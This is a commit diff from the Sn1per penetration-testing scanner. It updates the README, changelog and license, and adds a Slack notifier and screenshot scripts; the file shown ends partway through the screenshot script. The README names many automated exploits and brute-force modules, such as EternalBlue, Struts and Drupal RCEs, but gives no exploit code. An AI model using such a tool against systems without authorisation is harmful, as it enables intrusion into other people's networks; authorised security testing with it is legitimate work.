mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
2703495428
commit
6fab10e142
13
CHANGELOG.md
13
CHANGELOG.md
|
|
@ -1,4 +1,17 @@
|
|||
## CHANGELOG:
|
||||
* v7.0 - Added "webscan" mode for automated Burpsuite 2.x and Arachni web application scans only
|
||||
* v7.0 - Added Slack API notifications (Disabled by default..check ~/.sniper.conf)
|
||||
* v7.0 - Added scheduled scan tasks command switch (Needs additional configuration to setup... check README)
|
||||
* v7.0 - Added Axis2 authenticated deployer MSF exploit
|
||||
* v7.0 - Added Axis2 login brute force module
|
||||
* v7.0 - Added subjack tool to check for subdomain hijacking
|
||||
* v7.0 - Added sorted IP lists under $LOOT_DIR/ips/ips-all-sorted.txt
|
||||
* v7.0 - Added subnet retrieval for all 'recon' mode scans under $LOOT_DIR/nmap/subnets-$TARGET.txt
|
||||
* v7.0 - Added Webscreenshot.py and disabled cutycapt from default config
|
||||
* v7.0 - Added Gobuster (Disabled by default..check ~/.sniper.conf)
|
||||
* v7.0 - Fixed issue with SubOver not working due to bad path
|
||||
* v7.0 - Fixed issue with flyover mode running 2x
|
||||
* v6.3 - Added Drupal RESET Unserialize RCE CVE-2019-6340
|
||||
* v6.2 - Added Glassfish Admin traversal MSF exploit
|
||||
* v6.2 - Added ElasticSearch Java Injection MSF RCE exploit
|
||||
* v6.2 - Added WebTech web fingerprinting tool
|
||||
|
|
|
|||
|
|
@ -1,2 +1,2 @@
|
|||
## LICENSE:
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For professional use, a Sn1per Professional or Enterprise license must be purchased at https://xerosecurity.com.
|
||||
116
README.md
116
README.md
|
|
@ -4,8 +4,8 @@
|
|||
[](https://github.com/1N3/Sn1per/issues)
|
||||
[](https://github.com/1N3/Sn1per/)
|
||||
[](https://github.com/1N3/Sn1per/)
|
||||
[](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per)
|
||||
[](https://twitter.com/intent/follow?screen_name=crowdshield)
|
||||
[](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per)
|
||||
[](https://twitter.com/intent/follow?screen_name=xer0dayz)
|
||||
|
||||
## ABOUT:
|
||||
Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to https://xerosecurity.com.
|
||||
|
|
@ -59,25 +59,84 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com.
|
|||
- [x] Automatically gathers screenshots of all web sites
|
||||
- [x] Create individual workspaces to store all scan output
|
||||
|
||||
## AUTO-PWN:
|
||||
- [x] Apache Struts CVE-2018-11776 RCE exploit
|
||||
- [x] Android Insecure ADB RCE auto exploit
|
||||
- [x] Apache Tomcat CVE-2017-12617 RCE exploit
|
||||
- [x] Oracle WebLogic WLS-WSAT Component Deserialisation RCE CVE-2017-10271 exploit
|
||||
- [x] Drupal Drupalgedon2 RCE CVE-2018-7600
|
||||
- [x] GPON Router RCE CVE-2018-10561
|
||||
- [x] Apache Struts 2 RCE CVE-2017-5638
|
||||
- [x] Apache Struts 2 RCE CVE-2017-9805
|
||||
- [x] Apache Jakarta RCE CVE-2017-5638
|
||||
- [x] Shellshock GNU Bash RCE CVE-2014-6271
|
||||
## EXPLOITS:
|
||||
- [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003
|
||||
- [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts
|
||||
- [x] Drupal: CVE-2018-7600: Remote Code Execution - SA-CORE-2018-002
|
||||
- [x] GPON Routers - Authentication Bypass / Command Injection CVE-2018-10561
|
||||
- [x] MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
|
||||
- [x] Apache Tomcat: Remote Code Execution (CVE-2017-12617)
|
||||
- [x] Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271
|
||||
- [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
|
||||
- [x] Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)
|
||||
- [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
|
||||
- [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269
|
||||
- [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249
|
||||
- [x] Shellshock Bash Shell remote code execution CVE-2014-6271
|
||||
- [x] HeartBleed OpenSSL Detection CVE-2014-0160
|
||||
- [x] Default Apache Tomcat Creds CVE-2009-3843
|
||||
- [x] MS Windows SMB RCE MS08-067
|
||||
- [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)
|
||||
- [x] Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843
|
||||
- [x] MS08-067 Microsoft Server Service Relative Path Stack Corruption
|
||||
- [x] Webmin File Disclosure CVE-2006-3392
|
||||
- [x] VsFTPd 2.3.4 Backdoor
|
||||
- [x] ProFTPd 1.3.3C Backdoor
|
||||
- [x] MS03-026 Microsoft RPC DCOM Interface Overflow
|
||||
- [x] DistCC Daemon Command Execution
|
||||
- [x] JBoss Java De-Serialization
|
||||
- [x] HTTP Writable Path PUT/DELETE File Access
|
||||
- [x] Apache Tomcat User Enumeration
|
||||
- [x] Tomcat Application Manager Login Bruteforce
|
||||
- [x] Jenkins-CI Enumeration
|
||||
- [x] HTTP WebDAV Scanner
|
||||
- [x] Android Insecure ADB
|
||||
- [x] Anonymous FTP Access
|
||||
- [x] PHPMyAdmin Backdoor RCE
|
||||
- [x] PHPMyAdmin Backdoor
|
||||
- [x] PHPMyAdmin Auth Bypass
|
||||
- [x] JBoss Java De-Serialization RCE's
|
||||
- [x] OpenSSH User Enumeration
|
||||
- [x] LibSSH Auth Bypass
|
||||
- [x] SMTP User Enumeration
|
||||
- [x] Public NFS Mounts
|
||||
|
||||
## CORE INTEGRATIONS
|
||||
- NMap
|
||||
- Nikto
|
||||
- Metasploit
|
||||
- Arachni
|
||||
- Burpsuite
|
||||
- Slack API
|
||||
- Censys API
|
||||
|
||||
## PLUGINS:
|
||||
- BlackWidow
|
||||
- GooHak
|
||||
- BruteX
|
||||
- CMSMap
|
||||
- WPScan
|
||||
- Shocker
|
||||
- Slurp
|
||||
- Spoofcheck
|
||||
- SSH-Audit
|
||||
- Sublist3r
|
||||
- Wig
|
||||
- Yasuo
|
||||
- Inurlbr
|
||||
- theHarvester
|
||||
- Dirsearch
|
||||
- Gobuster
|
||||
- Clusterd
|
||||
- Whatweb
|
||||
- Jexboss
|
||||
- Webtech
|
||||
- Wafw00f
|
||||
- Slurp
|
||||
- Subjack
|
||||
- crt.sh
|
||||
- Subfinder
|
||||
- Amass
|
||||
- Dnscan
|
||||
- Subover
|
||||
- Project Sonar
|
||||
- Subjack
|
||||
|
||||
## KALI LINUX INSTALL:
|
||||
```
|
||||
|
|
@ -130,6 +189,9 @@ sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>
|
|||
[*] HTTPS WEB PORT HTTPS MODE
|
||||
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>
|
||||
|
||||
[*] WEBSCAN MODE
|
||||
sniper -t|--target <TARGET> -m|--mode webscan
|
||||
|
||||
[*] ENABLE BRUTEFORCE
|
||||
sniper -t|--target <TARGET> -b|--bruteforce
|
||||
|
||||
|
|
@ -139,6 +201,9 @@ sniper -t|--target <TARGET>
|
|||
[*] LOOT REIMPORT FUNCTION
|
||||
sniper -w <WORKSPACE_ALIAS> --reimport
|
||||
|
||||
[*] LOOT REIMPORTALL FUNCTION
|
||||
sniper -w <WORKSPACE_ALIAS> --reimportall
|
||||
|
||||
[*] DELETE WORKSPACE
|
||||
sniper -w <WORKSPACE_ALIAS> -d
|
||||
|
||||
|
|
@ -161,20 +226,19 @@ sniper -u|--update
|
|||
* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
|
||||
* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
|
||||
* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
|
||||
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
|
||||
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
|
||||
* **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.
|
||||
* **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
|
||||
* **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.
|
||||
|
||||
## SAMPLE REPORT:
|
||||
https://gist.github.com/1N3/8214ec2da2c91691bcbc
|
||||
|
||||
## LICENSE:
|
||||
This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited.
|
||||
This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use or resold and rebranded. Permission to distribute any part of the code for sale is strictly prohibited.
|
||||
|
||||
## DONATIONS:
|
||||
Donations are welcome. This will help fascilitate improved features, frequent updates and better overall support for sniper.
|
||||
- [x] BTC 1Fav36btfmdrYpCAR65XjKHhxuJJwFyKum
|
||||
- [x] ETH 0x20bB09273702eaBDFbEE9809473Fd04b969a794d
|
||||
- [x] LTC LQ6mPewec3xeLBYMdRP4yzeta6b9urqs2f
|
||||
- [x] XMR 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3EN24xprAQ1Z5Sy5s
|
||||
- [x] ZCASH t1fsizsk2cqqJAjRoUmXJSyoVa9utYucXt7
|
||||
## LEGAL DISCLAIMER:
|
||||
You may not rent or lease, distribute, modify, sell or transfer the software to a third party. Sn1per Community is free for distribution, and modification with the condition that credit is provided to the creator and not used for commercial use. You may not use software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall XeroSecurity or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this product, even if XeroSecurity has been advised of the possibility of such damages.
|
||||
|
||||
## COPYRIGHT:
|
||||
The software code and logos are owned by XeroSecurity and protected by United States copyright and/or patent laws of international treaty provisions. All rights reserved.
|
||||
|
|
|
|||
|
|
@ -0,0 +1,12 @@
|
|||
import os,sys
|
||||
from slackclient import SlackClient
|
||||
|
||||
#slack_token = os.environ["SLACK_API_TOKEN"]
|
||||
slack_token = ""
|
||||
sc = SlackClient(slack_token)
|
||||
|
||||
sc.api_call(
|
||||
"chat.postMessage",
|
||||
channel="sn1per-professional",
|
||||
text=str(sys.argv[1])
|
||||
)
|
||||
|
|
@ -0,0 +1,168 @@
|
|||
/***
|
||||
# This file is part of webscreenshot.
|
||||
#
|
||||
# Copyright (C) 2014, Thomas Debize <tdebize at mail.com>
|
||||
# All rights reserved.
|
||||
#
|
||||
# webscreenshot is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU Lesser General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# webscreenshot is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public License
|
||||
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
|
||||
***/
|
||||
|
||||
var Page = (function(custom_headers, http_username, http_password) {
|
||||
var opts = {
|
||||
width: 1200,
|
||||
height: 800,
|
||||
ajaxTimeout: 400,
|
||||
maxTimeout: 800,
|
||||
httpAuthErrorCode: 2
|
||||
};
|
||||
|
||||
var requestCount = 0;
|
||||
var forceRenderTimeout;
|
||||
var ajaxRenderTimeout;
|
||||
|
||||
var page = require('webpage').create();
|
||||
page.viewportSize = {
|
||||
width: opts.width,
|
||||
height: opts.height
|
||||
};
|
||||
|
||||
page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
|
||||
page.settings.userName = http_username;
|
||||
page.settings.password = http_password;
|
||||
|
||||
page.customHeaders = custom_headers;
|
||||
|
||||
page.onInitialized = function() {
|
||||
page.customHeaders = {};
|
||||
};
|
||||
// Silence confirmation messages and errors
|
||||
page.onConfirm = page.onPrompt = page.onError = noop;
|
||||
|
||||
page.onResourceRequested = function(request) {
|
||||
requestCount += 1;
|
||||
clearTimeout(ajaxRenderTimeout);
|
||||
};
|
||||
|
||||
page.onResourceReceived = function(response) {
|
||||
if (response.stage && response.stage == 'end' && response.status == '401') {
|
||||
page.failReason = '401';
|
||||
}
|
||||
|
||||
if (!response.stage || response.stage === 'end') {
|
||||
requestCount -= 1;
|
||||
if (requestCount === 0) {
|
||||
ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
var api = {};
|
||||
|
||||
api.render = function(url, file) {
|
||||
opts.file = file;
|
||||
|
||||
page.open(url, function(status) {
|
||||
if (status !== "success") {
|
||||
if (page.failReason && page.failReason == '401') {
|
||||
// Specific 401 HTTP code hint
|
||||
phantom.exit(opts.httpAuthErrorCode);
|
||||
} else {
|
||||
// All other failures
|
||||
phantom.exit(1);
|
||||
}
|
||||
} else {
|
||||
forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
|
||||
}
|
||||
});
|
||||
};
|
||||
|
||||
function renderAndExit() {
|
||||
// Trick to avoid transparent background
|
||||
page.evaluate(function() {
|
||||
document.body.bgColor = 'white';
|
||||
});
|
||||
|
||||
page.render(opts.file);
|
||||
phantom.exit(0);
|
||||
}
|
||||
|
||||
function noop() {}
|
||||
|
||||
return api;
|
||||
});
|
||||
|
||||
function main() {
|
||||
|
||||
var system = require('system');
|
||||
var p_url = new RegExp('url_capture=(.*)');
|
||||
var p_outfile = new RegExp('output_file=(.*)');
|
||||
var p_header = new RegExp('header=(.*)');
|
||||
|
||||
var p_http_username = new RegExp('http_username=(.*)');
|
||||
var http_username = '';
|
||||
|
||||
var p_http_password = new RegExp('http_password=(.*)');
|
||||
var http_password = '';
|
||||
|
||||
var temp_custom_headers = {
|
||||
// Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
|
||||
'Accept-Encoding': ' '
|
||||
};
|
||||
|
||||
for(var i = 0; i < system.args.length; i++) {
|
||||
if (p_url.test(system.args[i]) === true)
|
||||
{
|
||||
var URL = p_url.exec(system.args[i])[1];
|
||||
}
|
||||
|
||||
if (p_outfile.test(system.args[i]) === true)
|
||||
{
|
||||
var output_file = p_outfile.exec(system.args[i])[1];
|
||||
}
|
||||
|
||||
if (p_http_username.test(system.args[i]) === true)
|
||||
{
|
||||
http_username = p_http_username.exec(system.args[i])[1];
|
||||
}
|
||||
|
||||
if (p_http_password.test(system.args[i]) === true)
|
||||
{
|
||||
http_password = p_http_password.exec(system.args[i])[1];
|
||||
}
|
||||
|
||||
if (p_header.test(system.args[i]) === true)
|
||||
{
|
||||
var header = p_header.exec(system.args[i]);
|
||||
var p_header_split = header[1].split(': ', 2);
|
||||
var header_name = p_header_split[0];
|
||||
var header_value = p_header_split[1];
|
||||
|
||||
temp_custom_headers[header_name] = header_value;
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
|
||||
console.log("Usage: phantomjs [options] webscreenshot.js url_capture=<URL> output_file=<output_file.png> [header=<custom header> http_username=<HTTP basic auth username> http_password=<HTTP basic auth password>]");
|
||||
console.log('Please specify an URL to capture and an output png filename !');
|
||||
|
||||
phantom.exit(1);
|
||||
}
|
||||
else {
|
||||
var page = Page(temp_custom_headers, http_username, http_password);
|
||||
page.render(URL, output_file);
|
||||
}
|
||||
}
|
||||
|
||||
main();
|
||||
|
|
@ -0,0 +1,432 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
# This file is part of webscreenshot.
|
||||
#
|
||||
# Copyright (C) 2018, Thomas Debize <tdebize at mail.com>
|
||||
# All rights reserved.
|
||||
#
|
||||
# webscreenshot is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU Lesser General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# webscreenshot is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU Lesser General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU Lesser General Public License
|
||||
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
import re
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
import datetime
|
||||
import time
|
||||
import signal
|
||||
import multiprocessing
|
||||
import itertools
|
||||
import shlex
|
||||
import logging
|
||||
import errno
|
||||
|
||||
# Script version
|
||||
VERSION = '2.2.1'
|
||||
|
||||
# OptionParser imports
|
||||
from optparse import OptionParser
|
||||
from optparse import OptionGroup
|
||||
|
||||
# Options definition
|
||||
parser = OptionParser(usage="usage: %prog [options] URL")
|
||||
|
||||
main_grp = OptionGroup(parser, 'Main parameters')
|
||||
main_grp.add_option('-i', '--input-file', help = '<INPUT_FILE>: text file containing the target list. Ex: list.txt', nargs = 1)
|
||||
main_grp.add_option('-o', '--output-directory', help = '<OUTPUT_DIRECTORY> (optional): screenshots output directory (default \'./screenshots/\')', nargs = 1)
|
||||
main_grp.add_option('-r', '--renderer', help = '<RENDERER> (optional): renderer to use among \'phantomjs\' (legacy but best results), \'chrome\', \'chromium\' (version > 57) (default \'phantomjs\')', choices = ['phantomjs', 'chrome', 'chromium'], default = 'phantomjs', nargs = 1)
|
||||
main_grp.add_option('-w', '--workers', help = '<WORKERS> (optional): number of parallel execution workers (default 2)', default = 2, nargs = 1)
|
||||
main_grp.add_option('-v', '--verbosity', help = '<VERBOSITY> (optional): verbosity level, repeat it to increase the level { -v INFO, -vv DEBUG } (default verbosity ERROR)', action = 'count', default = 0)
|
||||
|
||||
proc_grp = OptionGroup(parser, 'Input processing parameters')
|
||||
proc_grp.add_option('-p', '--port', help = '<PORT> (optional): use the specified port for each target in the input list. Ex: -p 80', nargs = 1)
|
||||
proc_grp.add_option('-s', '--ssl', help = '<SSL> (optional): enforce ssl for every connection', action = 'store_true', default = False)
|
||||
proc_grp.add_option('-m', '--multiprotocol', help = '<MULTIPROTOCOL> (optional): perform screenshots over HTTP and HTTPS for each target', action = 'store_true', default = False)
|
||||
|
||||
http_grp = OptionGroup(parser, 'HTTP parameters')
|
||||
http_grp.add_option('-c', '--cookie', help = '<COOKIE_STRING> (optional): cookie string to add. Ex: -c "JSESSIONID=1234; YOLO=SWAG"', nargs = 1)
|
||||
http_grp.add_option('-a', '--header', help = '<HEADER> (optional): custom or additional header. Repeat this option for every header. Ex: -a "Host: localhost" -a "Foo: bar"', action = 'append')
|
||||
|
||||
http_grp.add_option('-u', '--http-username', help = '<HTTP_USERNAME> (optional): specify a username for HTTP Basic Authentication.')
|
||||
http_grp.add_option('-b', '--http-password', help = '<HTTP_PASSWORD> (optional): specify a password for HTTP Basic Authentication.')
|
||||
|
||||
conn_grp = OptionGroup(parser, 'Connection parameters')
|
||||
conn_grp.add_option('-P', '--proxy', help = '<PROXY> (optional): specify a proxy. Ex: -P http://proxy.company.com:8080')
|
||||
conn_grp.add_option('-A', '--proxy-auth', help = '<PROXY_AUTH> (optional): provides authentication information for the proxy. Ex: -A user:password')
|
||||
conn_grp.add_option('-T', '--proxy-type', help = '<PROXY_TYPE> (optional): specifies the proxy type, "http" (default), "none" (disable completely), or "socks5". Ex: -T socks')
|
||||
conn_grp.add_option('-t', '--timeout', help = '<TIMEOUT> (optional): renderer execution timeout in seconds (default 30 sec)', default = 30, nargs = 1)
|
||||
|
||||
parser.option_groups.extend([main_grp, proc_grp, http_grp, conn_grp])
|
||||
|
||||
# renderer binaries, hoping to find it in a $PATH directory
|
||||
## Be free to change them to your own full-path location
|
||||
PHANTOMJS_BIN = 'phantomjs'
|
||||
CHROME_BIN = 'google-chrome'
|
||||
CHROMIUM_BIN = 'chromium'
|
||||
|
||||
WEBSCREENSHOT_JS = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), './webscreenshot.js'))
|
||||
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), './screenshots/'))
|
||||
|
||||
# Logger definition
|
||||
LOGLEVELS = {0 : 'ERROR', 1 : 'INFO', 2 : 'DEBUG'}
|
||||
logger_output = logging.StreamHandler(sys.stdout)
|
||||
logger_output.setFormatter(logging.Formatter('[%(levelname)s][%(name)s] %(message)s'))
|
||||
|
||||
logger_gen = logging.getLogger("General")
|
||||
logger_gen.addHandler(logger_output)
|
||||
|
||||
# Macros
|
||||
SHELL_EXECUTION_OK = 0
|
||||
SHELL_EXECUTION_ERROR = -1
|
||||
PHANTOMJS_HTTP_AUTH_ERROR_CODE = 2
|
||||
|
||||
# Handful patterns
|
||||
p_ipv4_elementary = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
|
||||
p_domain = '[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6}'
|
||||
p_port = '\d{0,5}'
|
||||
p_resource = '(?:/(?P<res>.*))?'
|
||||
|
||||
full_uri_domain = re.compile('^(?P<protocol>http(?:|s))://(?P<host>%s|%s)(?::(?P<port>%s))?%s$' % (p_domain, p_ipv4_elementary, p_port, p_resource))
|
||||
|
||||
fqdn_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s$' % (p_domain, p_port, p_resource))
|
||||
fqdn_only = re.compile('^(?P<host>%s)%s$' % (p_domain, p_resource))
|
||||
|
||||
ipv4_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s' % (p_ipv4_elementary, p_port, p_resource))
|
||||
ipv4_only = re.compile('^(?P<host>%s)%s$' % (p_ipv4_elementary, p_resource))
|
||||
|
||||
entry_from_csv = re.compile('^(?P<host>%s|%s)\s+(?P<port>\d+)$' % (p_domain, p_ipv4_elementary))
|
||||
|
||||
# Handful functions
|
||||
def init_worker():
|
||||
"""
|
||||
Tell the workers to ignore a global SIGINT interruption
|
||||
"""
|
||||
signal.signal(signal.SIGINT, signal.SIG_IGN)
|
||||
|
||||
def kill_em_all(signal, frame):
|
||||
"""
|
||||
Terminate all processes while capturing a SIGINT from the user
|
||||
"""
|
||||
logger_gen.info('CTRL-C received, exiting')
|
||||
sys.exit(0)
|
||||
|
||||
def shell_exec(url, command, options):
|
||||
"""
|
||||
Execute a shell command following a timeout
|
||||
Taken from http://howto.pui.ch/post/37471155682/set-timeout-for-a-shell-command-in-python
|
||||
"""
|
||||
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
|
||||
|
||||
logger_url = logging.getLogger("%s" % url)
|
||||
logger_url.setLevel(options.log_level)
|
||||
|
||||
timeout = int(options.timeout)
|
||||
start = datetime.datetime.now()
|
||||
|
||||
try :
|
||||
p = subprocess.Popen(shlex.split(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
||||
# binaries timeout
|
||||
while p.poll() is None:
|
||||
time.sleep(0.1)
|
||||
now = datetime.datetime.now()
|
||||
if (now - start).seconds > timeout:
|
||||
logger_url.debug("Shell command PID %s reached the timeout, killing it now" % p.pid)
|
||||
logger_url.error("Screenshot somehow failed\n")
|
||||
|
||||
if sys.platform == 'win32':
|
||||
p.send_signal(signal.SIGTERM)
|
||||
else:
|
||||
p.send_signal(signal.SIGKILL)
|
||||
|
||||
return SHELL_EXECUTION_ERROR
|
||||
|
||||
retval = p.poll()
|
||||
if retval != SHELL_EXECUTION_OK:
|
||||
if retval == PHANTOMJS_HTTP_AUTH_ERROR_CODE:
|
||||
# HTTP Authentication request
|
||||
logger_url.error("HTTP Authentication requested, try to pass credentials with -u and -b options")
|
||||
else:
|
||||
# Phantomjs general error
|
||||
logger_url.error("Shell command PID %s returned an abnormal error code: '%s'" % (p.pid,retval))
|
||||
logger_url.error("Screenshot somehow failed\n")
|
||||
|
||||
return SHELL_EXECUTION_ERROR
|
||||
|
||||
else:
|
||||
# Phantomjs ok
|
||||
logger_url.debug("Shell command PID %s ended normally" % p.pid)
|
||||
logger_url.info("Screenshot OK\n")
|
||||
return SHELL_EXECUTION_OK
|
||||
|
||||
except Exception as e:
|
||||
if e.errno and e.errno == errno.ENOENT :
|
||||
logger_url.error('renderer binary could not have been found in your current PATH environment variable, exiting')
|
||||
else:
|
||||
logger_gen.error('Unknown error: %s, exiting' % e )
|
||||
return SHELL_EXECUTION_ERROR
|
||||
|
||||
def filter_bad_filename_chars(filename):
|
||||
#print (filename)
|
||||
"""
|
||||
Filter bad chars for any filename
|
||||
"""
|
||||
# Before, just avoid triple underscore escape for the classic '://' pattern
|
||||
filename = filename.replace('http://', '')
|
||||
filename = filename.replace('https://', '')
|
||||
#print (filename)
|
||||
|
||||
return re.sub('[^\w\-_\. ]', '-port', filename)
|
||||
#print (filename)
|
||||
|
||||
def extract_all_matched_named_groups(regex, match):
|
||||
"""
|
||||
Return a set of all extractable matched parameters.
|
||||
>>> full_uri_domain.groupindex
|
||||
{'domain': 1, 'port': 3}
|
||||
>>>full_uri_domain.match('http://8.8.8.8:80').group('domain')
|
||||
'8.8.8.8'
|
||||
>>>extract_all_matched_named_groups() => {'domain': '8.8.8.8', 'port': '80'}
|
||||
|
||||
"""
|
||||
result = {}
|
||||
for name, id in regex.groupindex.items():
|
||||
matched_value = match.group(name)
|
||||
if matched_value != None: result[name] = matched_value
|
||||
|
||||
return result
|
||||
|
||||
def entry_format_validator(line):
|
||||
"""
|
||||
Validate the current line against several regexes and return matched parameters (ip, domain, port etc.)
|
||||
"""
|
||||
tab = { 'full_uri_domain' : full_uri_domain,
|
||||
'fqdn_only' : fqdn_only,
|
||||
'fqdn_and_port' : fqdn_and_port,
|
||||
'ipv4_and_port' : ipv4_and_port,
|
||||
'ipv4_only' : ipv4_only,
|
||||
'entry_from_csv' : entry_from_csv
|
||||
}
|
||||
|
||||
for name, regex in tab.items():
|
||||
validator = regex.match(line)
|
||||
if validator:
|
||||
return extract_all_matched_named_groups(regex, validator)
|
||||
|
||||
def parse_targets(options, arguments):
|
||||
"""
|
||||
Parse list and convert each target to valid URI with port(protocol://foobar:port)
|
||||
"""
|
||||
|
||||
target_list = []
|
||||
|
||||
if options.input_file != None:
|
||||
with open(options.input_file,'rb') as fd_input:
|
||||
try:
|
||||
lines = [l.decode('utf-8').lstrip().rstrip().strip() for l in fd_input.readlines()]
|
||||
except UnicodeDecodeError as e:
|
||||
logger_gen.error('Your input file is not UTF-8 encoded, please encode it before using this script')
|
||||
sys.exit(0)
|
||||
else:
|
||||
lines = arguments
|
||||
|
||||
for index, line in enumerate(lines, start=1):
|
||||
matches = entry_format_validator(line)
|
||||
|
||||
# pass if line can be recognized as a correct input, or if no 'host' group could be found with all the regexes
|
||||
if matches == None or not('host' in matches.keys()):
|
||||
logger_gen.warn("Line %s '%s' could not have been recognized as a correct input" % (index, line))
|
||||
pass
|
||||
else:
|
||||
host = matches['host']
|
||||
|
||||
# Protocol is 'http' by default, unless ssl is forced
|
||||
if options.ssl == True:
|
||||
protocol = 'https'
|
||||
elif 'protocol' in matches.keys():
|
||||
protocol = str(matches['protocol'])
|
||||
else:
|
||||
protocol = 'http'
|
||||
|
||||
# Port is ('80' for http) or ('443' for https) by default, unless a specific port is supplied
|
||||
if options.port != None:
|
||||
port = options.port
|
||||
elif 'port' in matches.keys():
|
||||
port = int(matches['port'])
|
||||
|
||||
# if port is 443, assume protocol is https if is not specified
|
||||
protocol = 'https' if port == 443 else protocol
|
||||
else:
|
||||
port = 443 if protocol == 'https' else 80
|
||||
|
||||
# No resource URI by default
|
||||
if 'res' in matches.keys():
|
||||
res = str(matches['res'])
|
||||
else:
|
||||
res = None
|
||||
|
||||
# perform screenshots over HTTP and HTTPS for each target
|
||||
if options.multiprotocol:
|
||||
